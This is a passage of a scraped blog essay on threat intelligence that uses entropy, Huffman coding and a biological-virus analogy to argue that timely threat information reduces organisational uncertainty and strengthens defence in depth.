13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>I argue that an effective threat intelligence processing pipeline can produce superlinear returns at an organizational level</strong>. Concise but timely and relevant information can irrigate many layers of an interconnected defence-in-depth system. Information about threats can flow into:</p><ul><li><p>Engineering Teams that will perform patching and hardening of systems to mitigate or negate the damage of cyber threats.</p></li><li><p>Cyber Ops Teams that will deploy new detection rules, update response playbooks and run retro-hunts.</p></li><li><p>Architecture Teams that will embed new controls in general system design guidelines.</p></li><li><p>Risk and Compliance Teams becoming more efficient and have more evidence regarding how the security controls work under new threats.</p></li></ul><p>A small input with the right momentum can generate <code>non-linear systemic benefits</code> for the organizational defence-in-depth layers as a whole.</p><p>The momentum and the timeliness of threat information are decisive factors that influence the probability of superlinear effects in your defence-in-depth approach. As we saw in <a href="https://quasarops.com/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">Part 1</a>, timeliness is one of the properties of threat information quality. Momentum, on the other hand, is much more intangible and harder to measure. Momentum is a compounding value that facilitates the decision-making process by the concurrent participation of actors that work with the same tempo around an information processing pipeline*.</p><p>* <em>This is another important concept for adaptive defence which I won't delve into in this series.</em></p><p>But why is time so important for the synergistic effects of threat information processing and, ultimately, the actionability gradients of threat intelligence collected and analysed by an organization?</p><h1>The Uncertainty of Information</h1><p>Why is time important? Because of <code>entropy</code>. Somewhere between 1872 and 1875, <a href="https://en.wikipedia.org/wiki/Boltzmann%27s_entropy_formula">Ludwig Boltzmann</a> introduced the idea that entropy (S) is related to the number of possible microstates (W) of a system. He formulated the equation for entropy as S = k <em>ln(W), where "k" is the Boltzmann constant and "ln" represents the natural logarithm. According to this formula, </em>entropy quantifies the amount of information needed to specify the precise microstate of a system. The more microstates available for a system, the greater the entropy and the greater the uncertainty about the system's state.</p><p>A classic experiment pertains to the increase in heat for a gas inside a chamber. When heat increases so does the shared energy between the gas molecules, which in turn makes the gas molecules move faster, thus making it harder to predict exact combinations of microstates for the gas molecules within a certain volume.</p><p>Another classic example is the different states of molecule arrangements for solids, liquids and gasses as illustrated by different water states. Gas molecules have access to higher numbers of microstates than liquids or solids.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Hq8Q!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 424w, https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 848w, https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 1272w, https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg" width="1456" height="874" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:874,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;entropy-molecule-states.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="entropy-molecule-states.excalidraw" title="entropy-molecule-states.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 424w, https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 848w, https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 1272w, https://substackcdn.com/image/fetch/$s_!Hq8Q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2c17594f-3b87-4526-93fd-1bd4a4dde97a_793x476.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In 1948, a chap called <a href="https://en.wikipedia.org/wiki/Claude_Shannon">Claude Shannon</a> made an interesting connection between the idea of entropy in physics and the dynamics of information. Shannon posited that entropy is a measure of the amount of uncertainty or randomness in a signal or message. But what does this mean?</p><p>Imagine that you want to send the following message <code>this article is a great article</code>, how many bits would you need to transmit that message over the network? Well in a straightforward estimation, if we say that each character requires 8 bits then we need <code>8 x 31 = 248 bits</code>. However, can we do better than <code>248 bits</code>?</p><p>With natural language, characters and events don't need to be uniformly distributed (evenly spread out). Every language has characters such as <code>e</code>, <code>a</code> or even <code>spaces</code> that occur more frequently than others. When dealing with characters that aren't evenly distributed, what we would like to know is: <em>what is the </em><code>anticipated</code><em> number of bits needed to convey a message crafted with those characters?</em></p><p>If we can anticipate an event, then it means this event is less uncertain, i.e. there are fewer chances of a random result. In our sample message, it turns out this is a matter of weighted probabilities of the characters in the message, a metric we can define as a tree by what's known as <a href="https://en.wikipedia.org/wiki/Huffman_coding">Huffman Coding</a>, named after <a href="https://en.wikipedia.org/wiki/David_A._Huffman">David A. Huffman</a>. An optimal coding scheme for <code>this is a great article</code> can be calculated using different approaches but we chose to use a simple online tool <a href="https://huffman.ooz.ie/?text=this+article+is+a+great+article">like this one</a>:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1Ilc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1Ilc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 424w, https://substackcdn.com/image/fetch/$s_!1Ilc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 848w, https://substackcdn.com/image/fetch/$s_!1Ilc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 1272w, https://substackcdn.com/image/fetch/$s_!1Ilc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1Ilc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png" width="895" height="642" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:642,&quot;width&quot;:895,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!1Ilc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 424w, https://substackcdn.com/image/fetch/$s_!1Ilc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 848w, https://substackcdn.com/image/fetch/$s_!1Ilc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 1272w, https://substackcdn.com/image/fetch/$s_!1Ilc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe66c1410-b3ea-447d-85a7-7adf89a775ae_895x642.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>When analyzing the frequency each character has within <code>this is a great article</code> we obtain the following:</p><pre><code><code>+-----------+------------+----------------+---------+
| Character | Frequency  | Bits Required  | Size    |
+-----------+------------+----------------+---------+
| " "       | 5          | 3              | 15      |
| a         | 4          | 3              | 12      |
| i         | 4          | 3              | 12      |
| t         | 4          | 3              | 12      |
| e         | 3          | 3              | 9       |
| r         | 3          | 3              | 9       |
| s         | 2          | 4              | 8       |
| l         | 2          | 4              | 8       |
| c         | 2          | 4              | 8       |
| g         | 1          | 5              | 5       |
| h         | 1          | 5              | 5       |
| 96 bits   | 31 bits    |                | 103 bits|
+-----------+------------+----------------+---------+

Total: 96 + 31 + 103 = 230 bits
</code></code></pre><p>For sending the above string over a network, we have to send the tree as well as the above compressed code. As we can see, to encode the message using a Huffman encoding we would need <code>230 bits</code>, less than the original <code>248 bits</code>. We need less information to describe exactly the same message because we can better estimate the likelihood of each character (event), which means <em>we have less uncertainty involved</em>.</p><p>In information theory, <strong>information entropy can be used to quantify the amount of information contained in a message, based on the likelihood of each possible outcome</strong>. For example, a message that consists of only one possible outcome has zero entropy, as there is no uncertainty or randomness involved. On the other hand, a message that has many possible outcomes with similar likelihoods has high entropy, as there is a lot of uncertainty and randomness involved in predicting the outcome.</p><p>So going back to the question at the beginning of this section: why is time important? If we recall the <em>di&#279;grams</em> in the previous sections, we stated that our main objective is to understand the actionability of information, this actionability decreases the more we look into the future and increases as we approach our present horizon. We called these <em>threat horizons</em>. But why is this the case?</p><p>Well, one possible explanation is based on the nature of entropy in information theory: <em>the future is less predictable than the present, and the present is less predictable than the past</em>. The second law of thermodynamics states that the total entropy of an isolated system tends to increase over time, which is why we talk about an <a href="https://en.wikipedia.org/wiki/Arrow_of_time">arrow of time</a>. In both thermodynamics and information theory, higher entropy implies greater unpredictability or uncertainty about the future state or behaviour of a system. As a system evolves, it tends to explore a greater number of microstates thus making it harder to predict its possible configurations.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xj9C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xj9C!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 424w, https://substackcdn.com/image/fetch/$s_!xj9C!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 848w, https://substackcdn.com/image/fetch/$s_!xj9C!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 1272w, https://substackcdn.com/image/fetch/$s_!xj9C!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xj9C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg" width="1456" height="1275" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1275,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;entropy-and-threat-horizon.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="entropy-and-threat-horizon.excalidraw" title="entropy-and-threat-horizon.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!xj9C!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 424w, https://substackcdn.com/image/fetch/$s_!xj9C!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 848w, https://substackcdn.com/image/fetch/$s_!xj9C!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 1272w, https://substackcdn.com/image/fetch/$s_!xj9C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4b00154-eb5b-4180-8379-9358177c3c9a_1248x1093.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In essence, <strong>actionability is the inverse of entropy</strong>.</p><pre><code><code>Actionability = 1/H&#8203;
</code></code></pre><p>In terms of a system's entropy, <strong>higher uncertainty means there is a higher amount of information needed to describe the states of the system</strong> (there are many studies that show this, but I really liked <a href="https://www.sciencedirect.com/science/article/abs/pii/B012176480X001248">this one</a> because I am not a science guy and still found it enlightening). The more microstates there are and the more unpredictable they are, the more information is required, and the more difficult it will be to describe the system.</p><p>Intuitively, we know that the world is only getting more uncertain, cyber threats become increasingly more sophisticated and attack surfaces only grow with the development of the <a href="https://ioe.org/">Internet of Everything</a>. <em>It is harder to predict hypothetical or emergent cyber threats because there is more uncertainty about the potential configurations of operations that can combine into attack chains.</em> When <a href="https://www.computerhistory.org/timeline/computers/">the first computer program</a> running on an electronic computer appeared in 1948, it was probably very difficult to predict the cyber security risks that would be introduced by AI and Quantum Computing 60 years later.</p><p>Is there any way to manage this uncertainty from a business perspective?</p><h2>Decoding Uncertainty through Threat Intelligence</h2><p>It turns out there <em>is</em> a way to counter uncertainty and the gradients of risk associated with it in the context of organizational life. To uncover this, we need to go back in time, almost eighty years ago, before the structure of DNA was even described, when the Austrian physicist and philosopher Erwin Schr&#246;dinger inspired a generation of scientists by revisiting the fascinating philosophical question: <em>What is life?</em></p><p>Shr&#246;dinger was so enthralled by the matter that he actually wrote a book whose title is that very same question. In that book, he suggests that living organisms <strong>locally reduce entropy by maintaining highly ordered structures</strong>. Organic life achieves lower entropy and higher-order states by spending energy to maintain internal coherence. As Shr&#246;dinger puts it in his book "living matter evades the decay to equilibrium". But how? It would seem that there is a little thing called <code>metabolism</code> that helps us living entities evade this decay:</p><blockquote><p><em>All known organisms consist of one or more cells, the most basic units of life. Each cell maintains a precise and constant internal physiochemical environment throughout its life that is distinct from its surroundings. This is achieved by expending energy acquired from externally derived nutrients (free energy) to fuel diverse regulatory processes that are collectively termed &#8220;metabolism&#8221;. Therefore, organisms, and the individual cells that compose them, are open systems that continually exchange nutrients and wastes with their environment. In effect, all organisms maintain their low entropy status by &#8220;eating&#8221; free energy and &#8220;pooping&#8221; entropy. (<a href="https://doi.org/10.1007/s12052-009-0195-3">Schreiber, A., Gimbel, S. Evolution and the Second Law of Thermodynamics: Effectively Communicating to Non-technicians. Evo Edu Outreach 3, 99&#8211;106 (2010)</a></em></p></blockquote><p><em>(Uh yeah... I just quoted a text that mentions &#128169; and put it in an article about cyber stuff. Most 2yo and 3yo would celebrate my rebellious expression of art! I could keep on digressing about this but alas! poop time is of the essence!)</em></p><p>Now let us ask ourselves the following question: what is the embodiment of a threat to the internal coherence and ordered complexity of living organisms? The same thing that causes snotty noses &#128067;&#127997; in winter: a virus &#129440;</p><p>There is a reason why the most basic and naive representation of a cyber threat is a "computer virus": they represent a disruptor of digital systems in the same way their biological counterparts are of living ones.</p><p>Biological viruses are interesting entities, they exist in both an inert state called <code>virion</code> and an active "live" state called the <a href="https://www.sciencedirect.com/science/article/pii/S1631074810001724?via%3Dihub">virocell</a>. Virions are complete viral particles in extracellular form, they are like "spores" and lack the cellular machinery for independent replication, they must hijack a host cell to express their encoding and turn regular cells into <code>virocells</code>.</p><p>We can generalize this concept to cyber threats too. Digital threats have an inactive phase, the threat, and an active phase which is the attack. A threat is in a way like a virion that has not yet manifested into an attack by hijacking an organization's resources. Once these resources are hijacked (either by depleting them in the case of a DDOS attack or by achieving remote code execution), the attack tends to replicate (move laterally) and eventually capture and exfiltrate information that can damage an organization's integrity.</p><p>Viruses are also <a href="https://www.frontiersin.org/articles/10.3389/fviro.2021.753366/full">entropic drivers for disease</a> and cancer evolution by increasing the number of possible microstates available to the host cell, thus favouring mutations. The same can be said of <code>cyber attacks</code>, they are entropic drivers that alter, abuse, disrupt, degrade, or destroy the coherence of computer systems or information. We say a cyber attack has occurred when there is <em>evidence of material damage</em> to an organization. However, with threats, this damage is not yet actual: it has not yet crystallized. Cyber threats are the <strong>statistical representation of attacks</strong>: not real but potential attacks with varying degrees of likelihood. Cyber threats are unrealized attacks that have not yet caused actual damage.</p><p>We can define cyber threats as <strong>sequences of operations that carry the potential to disrupt informational coherence inside organizations</strong>. Future threats are harder to predict, the further away from the present horizon, the more unpredictable they are, and more information is required to understand (describe) them.</p><p>In this context, threat intelligence is an attempt to produce information that describes the actions involved in carrying out cyber attacks. The more descriptive this information is, the more coherent datapoints we have about threats, the higher our ability to protect our business from them.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pT95!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pT95!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 424w, https://substackcdn.com/image/fetch/$s_!pT95!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 848w, https://substackcdn.com/image/fetch/$s_!pT95!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 1272w, https://substackcdn.com/image/fetch/$s_!pT95!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pT95!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg" width="1456" height="1379" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1379,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;entropy-and-threat-horizon-02.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="entropy-and-threat-horizon-02.excalidraw" title="entropy-and-threat-horizon-02.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!pT95!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 424w, https://substackcdn.com/image/fetch/$s_!pT95!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 848w, https://substackcdn.com/image/fetch/$s_!pT95!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 1272w, https://substackcdn.com/image/fetch/$s_!pT95!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F10ba6765-ebb5-4c01-823a-540bfc4ae22a_1273x1206.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container 